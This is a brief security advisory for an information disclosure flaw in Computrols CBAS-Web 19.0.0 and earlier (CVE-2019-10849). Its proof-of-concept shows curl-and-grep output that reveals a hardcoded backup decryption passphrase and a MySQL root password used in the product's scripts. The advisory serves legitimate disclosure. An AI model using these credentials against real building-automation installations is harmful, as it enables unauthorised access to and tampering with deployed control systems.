Computrols CBAS-Web 19.0.0 Information Disclosure

Computrols CBAS-Web versions 19.0.0 and below suffer from an information disclosure vulnerability.

MD5 | 5c7936e80b5befaa3d555351201da658

Computrols CBAS-Web Information Disclosure

Affected versions: 19.0.0 and below
CVE: CVE-2019-10849

by Gjoko 'LiquidWorm' Krstic

$ curl -s | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz

$ curl -s | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"

Related Posts